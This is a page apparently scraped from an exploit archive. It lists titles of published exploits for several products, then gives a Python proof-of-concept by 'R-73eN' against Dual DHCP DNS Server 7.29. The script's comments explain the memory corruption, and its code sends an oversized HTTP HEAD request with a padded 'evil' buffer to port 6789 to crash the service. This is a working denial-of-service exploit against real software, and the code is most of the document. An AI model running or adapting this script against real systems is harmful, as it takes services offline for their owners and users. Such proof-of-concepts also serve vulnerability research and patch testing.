0231ae9ba7
5 new exploits Dual DHCP DNS Server 7.29 - Denial of Service TP-LINK TD-W8951ND - Denial of Service OpenSSH 7.2 - Denial of Service Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion AWBS 2.7.1 - (news.php viewnews) SQL Injection Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) - Multiple Security Vulnerabilities Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Security Vulnerabilities Advanced Webhost Billing System 2.2.2 - contact.php Multiple Cross-Site Scripting Vulnerabilities Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection Simple Machines Forum (SMF) 2.0.2 - 'index.php' scheduled Parameter Cross-Site Scripting Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting Cisco Unified Communications Manager 7/8/9 - Directory Traversal
62 lines
2.2 KiB
Python
Executable file
62 lines
2.2 KiB
Python
Executable file
# Title : Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)
|
|
# Date : 07/12/2016
|
|
# Author : R-73eN
|
|
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
|
|
# Vendor : http://dhcp-dns-server.sourceforge.net/
|
|
# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
|
|
# Vulnerability Description:
|
|
# The software crashes when it tries to write to an invalid address.
|
|
#
|
|
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
|
|
# MOV DWORD PTR SS:[ESP+4],31
|
|
# MOV DWORD PTR SS:[ESP],1
|
|
# .........................
|
|
# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.
|
|
#
|
|
# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
|
|
# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe
|
|
# contains 00 which is a badchar in our case.
|
|
#
|
|
|
|
import socket
|
|
import time
|
|
import sys
|
|
|
|
banner = "\n\n"
|
|
banner +=" ___ __ ____ _ _ \n"
|
|
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
|
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
|
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
|
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
|
print banner
|
|
|
|
host = ""
|
|
port = 6789
|
|
|
|
def send_request(host,port,data):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
s.connect((host,port))
|
|
s.send(data)
|
|
print "[+] Malicious Packet Sent [+]\n"
|
|
|
|
except Exception:
|
|
print "[+] Exploit failed . . .[+]\n"
|
|
s.close()
|
|
|
|
|
|
|
|
ebx = "BBBB"
|
|
eax = "CCCC"
|
|
evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400
|
|
|
|
if(len(sys.argv) < 1):
|
|
print '\n Usage : exploit.py ipaddress\n'
|
|
exit(0)
|
|
else:
|
|
host = sys.argv[1]
|
|
|
|
#The method doesn't really matters. It gets valideted only about the length
|
|
request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
|
|
send_request(host,port,request.replace("{REPLACE}",evil))
|
|
|